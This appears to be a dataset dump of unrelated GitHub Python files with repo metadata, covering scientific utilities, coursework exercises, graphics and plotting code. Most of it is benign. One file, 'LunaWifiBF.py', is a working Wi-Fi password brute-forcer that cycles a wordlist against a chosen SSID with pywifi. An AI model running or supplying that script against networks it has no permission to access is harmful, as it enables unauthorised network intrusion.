`~gwpy.table.Table` and return a `numpy.ndarray`\n\nGET_COLUMN = {}\nGET_COLUMN_EXTRA = {}\n\n\ndef get_snr_chi(events, snr_pow=2., chi_pow=2.):\n \"\"\"Calculate the 'SNR chi' column for this GstLAL ligolw table group\n \"\"\"\n snr = events['snr'][:]\n chisq = events['chisq'][:]\n snr_chi = snr**snr_pow / chisq**(chi_pow/2.)\n return snr_chi\n\n\nGET_COLUMN['snr_chi'] = get_snr_chi\nGET_COLUMN_EXTRA['snr_chi'] = ['snr', 'chisq']\n\n\ndef get_chi_snr(events, snr_pow=2., chi_pow=2.):\n \"\"\"Calculate the 'chi SNR' column for this GstLAL ligolw table group,\n reciprocal of the 'SNR chi' column\n \"\"\"\n return 1./get_snr_chi(events, snr_pow, chi_pow)\n\n\nGET_COLUMN['chi_snr'] = get_chi_snr\nGET_COLUMN_EXTRA['chi_snr'] = ['snr', 'chisq']\n\n# use same function as pycbc\nGET_COLUMN['mchirp'] = get_mchirp\nGET_COLUMN_EXTRA['mchirp'] = ['mass1', 'mass2']\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/table/io/gstlal.py","file_name":"gstlal.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"362577677","text":"import pytest\n\nfrom CYLGame.Utils import decrypt_token_list, encrypt_token_list\n\n\n@pytest.mark.parametrize(\"tokens\", [[\"12345678\", \"00000000\"], [\"8E4A1D8\"]])\n@pytest.mark.parametrize(\"key\", [b\"0123456789012345\", b\"=\\x18t\\xdf'\\xff\\xc3\\xde#\\xb8\\n\\x12j:\\x04\\x7f\"])\ndef test_encrypt_decrypt_tokens(tokens, key):\n e_tokens = encrypt_token_list(tokens, key)\n for real_token, decrypted_token in zip(tokens, decrypt_token_list(e_tokens, key)):\n assert real_token == decrypted_token\n","repo_name":"UMDLARS/CYLGame","sub_path":"tests/utils/test_cipher.py","file_name":"test_cipher.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18479533999","text":"def check_valid_position(rol, cow):\n if 0 <= rol < len(field) and 0 <= cow < len(field):\n return True\n else:\n return False\n\n\ndef new_position(dir):\n rol, col = rover_position[0] + directions[dir][0], rover_position[1] + directions[dir][1]\n\n return rol, col\n\n\ndef move_operation(rol, cow):\n global water_found\n global rover_position\n global concrete_found\n global metal_found\n global broken\n\n if field[rol][cow] == 'R':\n print(f\"Rover got broken at ({rol}, {cow})\")\n broken = True\n\n elif field[rol][cow] in ['M', 'C', 'W']:\n current_deposit = field[rol][cow]\n if current_deposit == \"W\":\n print(f\"Water deposit found at ({rol}, {cow})\")\n water_found += 1\n rover_position = [rol, cow]\n elif current_deposit == \"M\":\n print(f\"Metal deposit found at ({rol}, {cow})\")\n metal_found += 1\n rover_position = [rol, cow]\n elif current_deposit == \"C\":\n print(f\"Concrete deposit found at ({rol}, {cow})\")\n concrete_found += 1\n rover_position = [rol, cow]\n field[rol][cow] = '-'\n else:\n rover_position = [rol, cow]\n\n\ndef traverse_field(rol, cow, dir):\n global rover_position\n if dir == \"left\":\n rover_position = [rol, 5]\n elif dir == 'right':\n rover_position = [rol, 0]\n elif dir == 'up':\n rover_position = [5, cow]\n elif dir == 'down':\n rover_position = [0, cow]\n\n\nfield = []\nrover_position = []\n\ndirections = {\n 'up': [-1, 0],\n 'down': [1, 0],\n 'left': [0, -1],\n 'right': [0, 1]\n}\n\nfor row in range(6):\n row_input = input().split()\n field.append(row_input)\n if \"E\" in row_input:\n rover_position = [row, row_input.index(\"E\")]\n field[rover_position[0]][rover_position[1]] = '-'\n\ncommands = input().split(', ')\n\nwater_found = 0\nmetal_found = 0\nconcrete_found = 0\nbroken = False\n\nfor command in commands:\n new_row, new_col = new_position(command)\n if check_valid_position(new_row, new_col):\n move_operation(new_row, new_col)\n else:\n traverse_field(new_row, new_col, command)\n move_operation(rover_position[0], rover_position[1])\n if broken:\n break\n\nif water_found > 0 and metal_found > 0 and concrete_found > 0:\n print(\"Area suitable to start the colony.\")\nelse:\n print(\"Area not suitable to start the colony.\")\n\n","repo_name":"RadoslavTs/SoftUni-Courses","sub_path":"3. Python Advanced/Exams Practice/Retake Exam 14 APR 2022/02. martian_explorer.py","file_name":"02. martian_explorer.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71716629523","text":"# encode = utf-8\r\n\r\nimport pyttsx3\r\nimport rospy\r\nfrom std_msgs.msg import String\r\n\r\nclass TTS():\r\n\r\n def audio_output(self,msg):\r\n engine = pyttsx3.init()\r\n engine.say(msg.string)\r\n engine.runAndWait()\r\n\r\n def __init__(self):\r\n rospy.init_node('TTS',anonymous=False)\r\n self.set = rospy.Subscriber('cam_speak',Stirng, self.audio_output)\r\n self.set2 = rsopy.SUbscriber()\r\n\r\nif __name__ == '__main__':\r\n whatever = TTS()","repo_name":"HaoYejia/Give-the-Blind-an-Elephant-in-the-Room","sub_path":"Scripts/temp/ws/src/temp/src/TTS.py","file_name":"TTS.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7037253241","text":"\nfrom OpenGL.GL import *\nfrom ctypes import c_float, c_ushort\n\nclass Mesh:\n def __init__(self, vertices, normals=None, indices=None):\n self.varray = glGenVertexArrays(1)\n\n glBindVertexArray(self.varray)\n\n self.vertices = glGenBuffers(1)\n nativeVertices = (c_float * len(vertices))(*vertices)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.vertices)\n glBufferData(GL_ARRAY_BUFFER, nativeVertices, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n del nativeVertices\n\n if normals:\n self.normals = glGenBuffers(1)\n nativeNormals = (c_float * len(normals))(*normals)\n\n glBindBuffer(GL_ARRAY_BUFFER, self.normals)\n glBufferData(GL_ARRAY_BUFFER, nativeNormals, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n del nativeNormals\n\n if indices:\n self.indices = glGenBuffers(1)\n\n nativeIndices = (c_ushort *len(indices))(*indices)\n\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.indices)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, nativeIndices, GL_STATIC_DRAW)\n\n del nativeIndices\n\n glBindVertexArray(0)\n\n if indices:\n self.count = len(indices)\n else:\n self.count = len(vertices)/3\n\n def draw(self, type=GL_TRIANGLES):\n glBindVertexArray(self.varray)\n\n if hasattr(self, 'indices'):\n glDrawElements(type, self.count, GL_UNSIGNED_SHORT, None)\n else:\n glDrawArrays(type, 0, self.count)\n\n glBindVertexArray(0)\n\n","repo_name":"swiftcoder/aurae","sub_path":"mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"8991664672","text":"# Author: RT\n# Date: 2022-12-17T12:41:36.507Z\n# URL: https://leetcode.com/problems/evaluate-reverse-polish-notation/\n\n\nfrom operator import add, mul, sub\n\n\nclass Solution:\n def evalRPN(self, tokens: list[str]) -> int:\n def div(a, b):\n return int(a / b)\n\n op_map = {\n \"+\": add,\n \"-\": sub,\n \"*\": mul,\n \"/\": div,\n }\n stack = []\n for token in tokens:\n if token in op_map:\n b = stack.pop()\n a = stack.pop()\n stack.append(op_map[token](a, b))\n else:\n stack.append(int(token))\n\n return stack.pop()\n","repo_name":"Roytangrb/dsa","sub_path":"leetcode/python/150-evaluate-reverse-polish-notation.py","file_name":"150-evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"17024133795","text":"import termcolor2\nimport colorama\ncolorama.init()\n\n\n\n\nmyText = '''\n\n██░▀██████████████▀░██ \n█▌▒▒░████████████░▒▒▐█ # # # # ## Luɲɑ\n█░▒▒▒░██████████░▒▒▒░█ # # # ## # # #\n▌░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░▐ # # # # # ####\n░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░ # # # # # # #\n███▀▀▀██▄▒▒▒▒▒▒▒▄██▀▀▀██ #### ## # # # #\n██░░░▐█░▀█▒▒▒▒▒█▀░█▌░░░█ # \n▐▌░░░▐▄▌░▐▌▒▒▒▐▌░▐▄▌░░▐▌ ##\n█░░░▐█▌░░▌▒▒▒▐░░▐█▌░░█ \n▒▀▄▄▄█▄▄▄▌░▄░▐▄▄▄█▄▄▀▒ Wɪғɪ ʙʀᴜᴛᴇғᴏʀᴄɪɴɢ \n░░░░░░░░░░└┴┘░░░░░░░░░ \n██▄▄░░░░░░░░░░░░░░▄▄██ \n████████▒▒▒▒▒▒████████ \n█▀░░███▒▒░░▒░░▒▀██████\n█▒░███▒▒╖░░╥░░╓▒▐█████\n█▒░▀▀▀░░║░░║░░║░░█████\n██▄▄▄▄▀▀┴┴╚╧╧╝╧╧╝┴┴███\n██████████████████████\n'''\n\n# a definiir com com paloma \nprint(termcolor2.colored(myText, 'yellow'))\n\n\nimport pywifi\nimport time\nfrom pywifi import const\n\nwifi = pywifi.PyWiFi()\n\niface = wifi.interfaces()[0]\n\nif iface.status() == const.IFACE_CONNECTED:\n print('=> There is already a network connected')\n choose = input('''=> Disconnect and continue or give up?\n (type disk to disconnect or gu for give up)\\n''')\n if choose == 'disconnect':\n iface.disconnect()\n print('=> disconnected')\n time.sleep(2)\n elif choose == 'gu':\n print('=> okay, bye')\n time.sleep(2)\n exit()\n\n\nassert iface.status() in\\\n [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]\n\nprofile = pywifi.Profile()\nssid = input('{+} SSID: ')\nprofile.ssid = ssid\nprofile.auth = const.AUTH_ALG_OPEN\nprofile.akm.append(const.AKM_TYPE_WPA2PSK)\nprofile.cipher = const.CIPHER_TYPE_CCMP\n\nssid = input('{+} wordlist(.txt): ')\nf = open(ssid,'r')\narq = f.readlines()\nlines = len(arq)\n\n\ni=0\nfor tentativa in arq:\n lista = tentativa.rstrip('\\n')\n print('Attemp',i,':',lista)\n i+=1\n profile.key = lista\n iface.remove_all_network_profiles()\n tmp_profile = iface.add_network_profile(profile)\n iface.connect(tmp_profile)\n time.sleep(5)\n if iface.status() == const.IFACE_CONNECTED:\n print('connected')\n print('''\n have a nice day :3\n ''')\n #iface.disconnect()\n time.sleep(1)\n exit()\nf.close()\n\n\n\n\n","repo_name":"Shokitex/Luna_WifiBF","sub_path":"LunaWifiBF.py","file_name":"LunaWifiBF.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23924309122","text":"#STUDENTS: Jason Pettit, Marcus Gonzalez\n#CST205-40_SP19\n#Module 7 Lab 16\n\nimport urllib\nimport os\n\ndef htmlScrape(site,openTag,closeTag):\n \"\"\"Take 3 arguments:website, opening html tag and closing html tag. \n Creates new webpage, data.html, with provided tags.\n \"\"\"\n os.chdir(setMediaPath())\n file=open(\"data.html\",\"w\")\n article=False\n data=urllib.urlopen(site)\n for line in data.readlines():\n if openTag in line:\n article = True\n if article:\n file.write(line)\n if closeTag in line:\n article = False\n file.close()\n \nhtmlScrape(\"https://www.ign.com/\",\"\")\n","repo_name":"Pentagration/Lab16_JM","sub_path":"lab16.py","file_name":"lab16.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26633069180","text":"from flask import Flask\nfrom flask_socketio import SocketIO\nfrom data_marketplace.utils.dlt import connect_iota\n\napp = Flask(__name__, \\\n instance_relative_config=True)\napp.config.from_object('config.default')\napp.config.from_pyfile('config.py')\nsocketio = SocketIO(app, ping_timeout=app.config['PING_TIMEOUT'],\n max_http_buffer_size=app.config['MAX_SEND_SIZE'])\napp.iota = connect_iota(app.config['IOTA_NODE'],\n app.config['IOTA_SEED'])\n","repo_name":"grandq33769/gdpr-data-marketplace","sub_path":"data_marketplace/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22575615911","text":"import argparse\nfrom collections import namedtuple\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', type=str,\n help='input file')\n\nargs = parser.parse_args()\n\nItem = namedtuple('Item', ['value', 'weight'])\n\ndef read_file(filename):\n items = []\n\n with open(filename, 'r') as f:\n for line_num, line in enumerate(f):\n if line_num == 0:\n capacity, num_items = map(int, line.strip().split(' '))\n continue\n value, weight = map(int, line.strip().split(' '))\n item = Item(value, weight)\n items.append(item)\n \n return capacity, num_items, items\n\ndef solve_knapsack_dynamic(capacity, items):\n num_items = len(items)\n\n sol_arr = [[0] * (num_items + 1) for _ in range(capacity + 1)]\n\n for item_num, item in enumerate(items, 1):\n if item_num % 10 == 0:\n print(item_num)\n for cap in range(1, capacity + 1):\n item_less_val = sol_arr[cap][item_num - 1]\n if cap - item.weight < 0:\n sol_arr[cap][item_num] = item_less_val\n else: \n include_item_val = sol_arr[cap - item.weight][item_num - 1] + item.value\n sol_arr[cap][item_num] = max(item_less_val, include_item_val)\n\n\n return sol_arr\n\ndef main():\n filename = args.filename\n capacity, num_items, items = read_file(filename)\n print(capacity, num_items)\n sol = solve_knapsack_dynamic(capacity, items)\n #for line in sol:\n # print(line)\n print(sol[capacity][num_items])\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Inevitable-Marzipan/algo_design","sub_path":"problem 9/dynamic_knapsack.py","file_name":"dynamic_knapsack.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"911023036","text":"from __future__ import absolute_import, print_function\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom .BaseStructProtocol import BaseStructProtocol\nfrom codifyComplexes.CodifyComplexException import CodifyComplexException\nfrom computeFeatures.seqStep.seqToolManager import SeqToolManager\nAA_CODE_ELEMENTS= SeqToolManager.AA_CODE_ELEMENTS\n'''\n(feature_name, path_to_dir, columns ). If columns==None, all columns will be used\nStructural features must come first as sequential single chains features muy contain more aminoacids\n(e.g. non 3D-solved residues)\n'''\nFEATURES_TO_INCLUDE_CHAIN= [\n (\"psaia\", (\"structStep/PSAIA/procPSAIA\", None)),\n (\"halfSphereExpos\", (\"structStep/halfSphereExpos\", None)),\n (\"dssp\", (\"structStep/DSSP\", [3])),\n (\"al2co\", (\"seqStep/conservation/al2co\",None)),\n (\"winPssms\", (\"seqStep/conservation/pssms/windowedPSSMs/wSize11\", None)),\n (\"winSeq\", (\"seqStep/slidingWinSeq11\", None))\n]\nFEATURES_TO_INCLUDE_PAIR= [\n (\"corrMut\", (\"seqStep/conservation/corrMut\", None)),\n]\n\nclass StructProtocol(BaseStructProtocol):\n '''\n This class implements structural voronoi environment codification\n '''\n def __init__(self, dataRootPath, cMapPath, prevStepPaths=None, singleChainfeatsToInclude= FEATURES_TO_INCLUDE_CHAIN, \n pairfeatsToInclude=FEATURES_TO_INCLUDE_PAIR, verbose=False):\n '''\n :param dataRootPath: str. A path to computedFeatures directory that contains needed features. Example:\n computedFeatures/\n common/\n contactMaps/\n seqStep/\n conservation/\n ...\n structStep/\n PSAIA/\n VORONOI/\n ... \n \n :param cMapPath: str. A path to a dir that contains the contact map of the protein complex\n\n :param prevStepPaths: str or str[]. A path to previous results files directory. If it is None, contactMaps files will be used\n to define which residue pairs are in contact. Can also be a str[] if multiple feedback_path's\n wanted\n '''\n BaseStructProtocol.__init__(self, dataRootPath, cMapPath, prevStepPaths,\n singleChainfeatsToInclude=FEATURES_TO_INCLUDE_CHAIN, \n pairfeatsToInclude= FEATURES_TO_INCLUDE_PAIR, verbose= verbose)\n\n def loadSingleChainFeatures(self, prefixOneChainType, chainType):\n '''\n @overrides BaseStructProtocol method to make use of sequence profiles (loaded directly) and struct\n neighbour but not computing struct neighbours on non central residue features of sliding window\n Loads all features files computed for ligand or receptor chains. Returns a pandas.DataFrame \n that contains in each row all features from all files for each amino acid. Just amino acids\n that appears in each file will be included. Others will be ruled out (intersection)\n :param prefixOneChainType: str. A prefixOneChainType that identifies the receptor or ligand\n :param chainType: str. \"l\" for ligand and \"r\" for receptor\n :return df: pandas.DataFrame. A pandas.Dataframe in which each row represents\n one amino acid\n Column names are:\n 'chainId%s', 'resId%s', 'resName%s', [properties] #no defined order for properties\n %s is L if chainType==\"l\" and R if chainType==\"r\"\n '''\n #super (BaseStructProtocol,self) is AbstractProtocol\n singleChainFeats= super(BaseStructProtocol,self).loadSingleChainFeatures( prefixOneChainType, chainType) #Load with no aggregation\n\n chainType= chainType.upper()\n winSize= max([ int(elem.split(\".\")[-1][:-1]) for elem in singleChainFeats.columns if elem.startswith(\"pssmWin\") ])+1\n centralRes= winSize//2\n #find variables that will not be considered for structural aggreation: sliding window features of non central amino acids\n \n selectedSeqEntr= set([ 'informationWin.%d.%d%s'%(i, centralRes, chainType) for i in range(2)])\n selectedPssm= set([ 'pssmWin.%d.%d%s'%(i, centralRes, chainType) for i in range(20)])\n selectedPsfm= set([ 'psfmWin.%d.%d%s'%(i, centralRes, chainType) for i in range(20)])\n selectedWinAA= set([ 'aaWin.0.%d_dummy_%s%s'%(centralRes,letter, chainType) for letter in AA_CODE_ELEMENTS ])\n\n #this variables will be aggregated\n centralResCols= selectedSeqEntr.union(selectedPssm).union(selectedPsfm).union(selectedWinAA)\n\n winCols= set([col for col in singleChainFeats.columns if not \"ggr\" in col and \"Win\" in col ])\n #this variables will not be aggreaged\n allWinButCentralCols= winCols.difference(centralResCols)\n \n allButWinData= singleChainFeats[ [col for col in singleChainFeats.columns if not col in allWinButCentralCols] ]\n winData= singleChainFeats[ list(singleChainFeats.columns[:3])+[col for col in singleChainFeats.columns if col in allWinButCentralCols] ]\n# print( list( allButWinData.columns) );raw_input(\"enter\")\n singleChainFeats= self.addSingleChainAggregation(allButWinData, chainType)\n mergeOn= [ elem%chainType.upper() for elem in [\"chainId%s\", \"resId%s\", \"resName%s\"] ]\n singleChainFeats= pd.merge(singleChainFeats, winData, how='inner', on=mergeOn) \n return singleChainFeats\n\n\n# uncomment to use product terms\n# def addProductTerms(self, df):\n\n# winSize= max([ int(elem.split(\".\")[-1][:-1]) for elem in df.columns if elem.startswith(\"pssmWin\") ])+1\n# centralRes= winSize//2\n\n# selectedColsL= sorted(['pssmWin.%d.%d%s'%(i, centralRes, \"L\") for i in range(20)] +\n# [ 'total_RASAL', 'average_DPXL', 'HydrophobicityL'])\n# selectedColsR= sorted(['pssmWin.%d.%d%s'%(i, centralRes, \"R\") for i in range(20)] +\n# [ 'total_RASAR', 'average_DPXR', 'HydrophobicityR'])\n# print(selectedColsL)\n# for colL in selectedColsL:\n# for colR in selectedColsR:\n# df[ colL+colR+\"_P\"]= df[colL]*df[colR]\n# return df\n\n# def applyProtocol( self, prefixComplex, prefixL, prefixR):\n# '''\n# This method is the basic skeleton for applyProtocol of subclasses\n# Given a prefix that identifies the complex and prefixes that identifies\n# the ligand and the receptor, this method integrates the information that\n# is contained in self.dataRootPath and is described in self.singleChainfeatsToInclude\n# \n# :param prefixComplex: str. A prefix that identifies a complex\n# :param prefixL: str. A prefix that identifies the ligand of the complex\n# :param prefixR: str. A prefix that identifies the receptor of the complex\n# :return df: pandas.DataFrame. A pandas.Dataframe in which each row represents\n# a pair of amino acids in direct form (L to R).\n# Column names are:\n# 'chainIdL', 'resIdL', 'resNameL', 'chainIdR', 'resIdR', 'resNameR', 'categ'\n# [ propertiesL .... propertiesR .... propertiesP]\n# '''\n# allPairsCodified= super(StructProtocol,self).applyProtocol( prefixComplex, prefixL, prefixR)\n# allPairsCodified= self.addProductTerms(allPairsCodified)\n# allPairsCodified= self.reorderColumns(allPairsCodified)\n# return allPairsCodified\n\n","repo_name":"rsanchezgarc/BIPSPI","sub_path":"codifyComplexes/codifyProtocols/StructProtocol.py","file_name":"StructProtocol.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"40489151657","text":"'''\nThis file contains the code for the cost optimization analysis. The code takes the results of\nrunning a bag of task on t2.large and g4dn.xlarge instance types and determines cost-efficient\nconfiguration for this workload.\n'''\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.patches import Rectangle\n\n\ndef read_results(path_to_results='analysis/results/experiment_1_hete'):\n instance_codes = os.listdir(path_to_results)\n results = pd.DataFrame(columns=['t2.large', 'g4dn.xlarge', 'price', 'throughput'])\n for instance_code in instance_codes:\n instances = {'t2.large': int(instance_code.split('_')[0]),\n 'c5.2xlarge': int(instance_code.split('_')[1]),\n 'g4dn.xlarge': int(instance_code.split('_')[2])\n }\n if instances['c5.2xlarge'] != 0:\n continue\n path_to_file = f\"{path_to_results}/{instance_code}\"\n result_files = os.listdir(path_to_file)\n throughputs = []\n for file in result_files:\n result = pd.read_csv(f'{path_to_file}/{file}')\n throughput = result['completion_time'].count() / (0.001*result['completion_time'].max())\n throughputs.append(throughput)\n throughput = np.mean(throughputs)\n d = {'t2.large': instances['t2.large'],\n 'g4dn.xlarge': instances['g4dn.xlarge'],\n 'price': round(instances['t2.large']*0.0928 + instances['g4dn.xlarge']*0.526, 4),\n 'throughput': round(throughput, 2)\n }\n results = pd.concat([results, pd.DataFrame(d, index=[0])], axis=0)\n results.to_csv('analysis/tables/experiment_1_hete/cost_optimization.csv', index=False)\n return results\n\n\n\nthreshold = 125.0\nresults = read_results()\nresults = results.sort_values(by=['throughput'])\nsatisfactory_throughput = results[results['throughput'] >= threshold]\nmin_price = satisfactory_throughput['price'].min()\nmin_price_config = satisfactory_throughput[satisfactory_throughput['price'] == min_price]\noptimum_point = (min_price_config['throughput'].values[0], min_price_config['price'].values[0])\n\nresults = results.loc[(results['t2.large']<14) & (results['g4dn.xlarge']>0)]\n\nfor point in zip(results['throughput'], results['price']):\n if point == optimum_point:\n plt.scatter(point[0], point[1], color='yellow', marker='*', edgecolors='black', s=200)\n plt.annotate(f't2.large:{min_price_config[\"t2.large\"].values[0]}' +\n f'\\ng4dn.xlarge:{min_price_config[\"g4dn.xlarge\"].values[0]}',\n xy=point, xytext=(8, -15), textcoords='offset points', ha='left', va='bottom')\n else:\n plt.scatter(point[0], point[1], color='red' if point[0] < threshold else 'green',\n marker='x' if point[0] < threshold else 'o')\n\nplt.xlabel('Throughput (tasks/s)')\nplt.ylabel('Price ($/h)')\nplt.savefig('analysis/figures/experiment_1_hete/cost_optimization_2.pdf', dpi=300, bbox_inches='tight')\nplt.show()\n\nprices = np.zeros((results['t2.large'].max()+1, results['g4dn.xlarge'].max())) # 2D array of prices\nthroughputs = np.zeros((results['t2.large'].max()+1, results['g4dn.xlarge'].max())) # 2D array of throughputs\n\nfor row in results.itertuples():\n if row[2] == 0 or row[1] > 13:\n continue\n prices[row[1], row[2]-1] = row[3]\n throughputs[row[1], row[2]-1] = row[4]\n\nf, ax = plt.subplots()\nax = sns.heatmap(throughputs, cmap='hot_r', linewidths=0.5, annot=prices, fmt='.3f',\n cbar_kws={'label': 'throughput (tasks/s)'})\n\nax.add_patch(Rectangle((1, 0), 1, 1, fill=False, edgecolor='blue', lw=3))\n\n\n\nplt.xticks(np.arange(0.5, throughputs.shape[1]+0.5, 1), np.arange(1, throughputs.shape[1]+1, 1))\nplt.xlabel('Number of g4dn.xlarge')\nplt.ylabel('Number of t2.large')\nplt.savefig('analysis/figures/experiment_1_hete/cost_optimization_heatmap_2.pdf', dpi=300, bbox_inches='tight')\nplt.show()\n","repo_name":"hpcclab/heterogeneity_measure","sub_path":"analysis/cost_optimization.py","file_name":"cost_optimization.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71521097680","text":"from threading import Thread\nimport json\nfrom src import config\n\n\nclass Referee:\n\n def listen(self):\n while True:\n message = self.ws.recv()\n if message != \"\":\n command = json.loads(message)\n\n if command[\"signal\"] == \"stop\" and self.robotID in command[\"targets\"]:\n self.go = False\n elif command[\"signal\"] == \"start\" and self.robotID in command[\"targets\"]:\n index = command[\"targets\"].index(self.robotID)\n color = command[\"baskets\"][index]\n self.basketColor = color\n self.go = True\n else:\n pass\n\n def __init__(self, ws):\n # Params\n self.parser = config.config()\n self.go = False\n self.stopped = False\n self.robotID = self.parser.get(\"Game\", \"robotID\")\n self.basketColor = \"\"\n # Server address\n self.ws = ws\n # Start Thread\n self.w = Thread(name='refereeThread', target=self.listen)\n self.w.start()\n\n def stop(self):\n self.stopped = True\n","repo_name":"KirillAnohin/True-Randomness","sub_path":"src/referee.py","file_name":"referee.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8820074954","text":"\"\"\"This function loads .lsm or .tif data file (just one).\n\nGiven the filename as input, the output are the matrices of the maximum intensity\nprojection of red and green channels (nuclei and spots respectively).\n\"\"\"\n\nimport numpy as np\nimport tifffile\nfrom PyQt5 import QtGui, QtWidgets\n\n\nclass LoadLsmOrTif5D:\n def __init__(self, fname, nucs_spts_ch):\n\n file_array = tifffile.imread(fname) # load file\n steps, z, c, x_len, y_len = file_array.shape # shape info\n\n pbar = ProgressBar(total1=steps)\n pbar.show()\n\n red_mtx = np.zeros((steps, x_len, y_len)) # initialization of nuclei matrix\n green_mtx = np.zeros((steps, x_len, y_len)) # initialization of spots matrix\n\n for t in range(steps):\n pbar.update_progressbar(t)\n for x in range(x_len):\n red_mtx[t, x, :] = file_array[t, :, nucs_spts_ch[0], x, :].max(0) # maximum intensity projection\n green_mtx[t, x, :] = file_array[t, :, nucs_spts_ch[1], x, :].max(0) # maximum intensity projection\n\n\n self.red_mtx = red_mtx\n self.green_mtx = green_mtx\n\n\nclass ProgressBar(QtGui.QWidget):\n def __init__(self, parent=None, total1=20):\n super(ProgressBar, self).__init__(parent)\n self.name_line1 = QtGui.QLineEdit()\n\n self.progressbar = QtWidgets.QProgressBar()\n self.progressbar.setMinimum(1)\n self.progressbar.setMaximum(total1)\n\n\n main_layout = QtGui.QGridLayout()\n main_layout.addWidget(self.progressbar, 0, 0)\n\n self.setLayout(main_layout)\n self.setWindowTitle(\"Progress\")\n self.setGeometry(500, 300, 300, 50)\n\n\n def update_progressbar(self, val1):\n self.progressbar.setValue(val1)\n QtWidgets.qApp.processEvents()\n","repo_name":"ant-trullo/MitoTrack_v4_0","sub_path":"LoadLsmOrTif5D.py","file_name":"LoadLsmOrTif5D.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74470795282","text":"\nimport os\n\nimport numpy as np\nfrom scipy import misc\nimport glob\n\ndef load_data(path, training_data_file, num_results):\n\ttraining_data = []\n\n\ttraining_path = os.path.normpath(os.path.join(path, training_data_file))\n\n\tf = open(training_path, 'r')\n\tfor line in f:\n\n\t\tline = line.strip(\"\\n\")\n\t\t\n\t\tlineParts = line.split(\" \")\n\n\t\tvalue = lineParts[0]\n\t\tdirectory = lineParts[1]\n\n\t\tvalue_path = os.path.normpath(os.path.join(path, directory))\n\n\t\tpng_path = os.path.normpath(os.path.join(value_path, '*.png'))\n\n\t\t# Get list of files in each directory and read them in.\n\t\tfor image_filename in glob.glob(png_path):\n\t\t\timage = misc.imread(image_filename, True)\n\n\t\t\ttraining_data.append(tuple((value, image)))\n\n\treturn training_data\n\ndef load_notes_data(path, training_data_file, num_results):\n\ttraining_data = load_data(path, training_data_file, num_results)\n\n\twrapped_data = []\n\tfor t in training_data:\n\t\twrapped_data.append(tuple((vectorized_result(int(t[0]), num_results), t[1])))\n\n\treturn wrapped_data\n\ndef vectorized_result(j, num_results):\n\te = np.zeros(num_results)\n\te[j] = 1.0\n\treturn e","repo_name":"kfreezen/shaped-note-recognizer","sub_path":"training_data_loader.py","file_name":"training_data_loader.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17259471133","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\nimport pickle\nimport textwrap # for wrapping text for plotly charts\n\nimport tensorflow_hub as hub\nimport umap\nimport hdbscan\nfrom sklearn.metrics import silhouette_score\n\nimport plotly.express as px\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\n\napp = dash.Dash(external_stylesheets=external_stylesheets)\n\ndir_name = \"/project/data_preprocessed_csv/\"\ndf_metadata = pd.read_csv(\"/project/preprocessing/metadata.csv\", index_col=0)\ncounts = df_metadata.groupby(\"case\").case.count()\ncases = counts[counts > 1].index.values\ndf_lawyers = pd.read_csv(\"/project/eda/lawyers_stats.csv\", index_col=0)\nembed = hub.load(\"https://tfhub.dev/google/universal-sentence-encoder/4\")\n\napp.layout = html.Div(\n [\n html.H1(\"Deposition Analyser\"),\n html.H3(\"Question 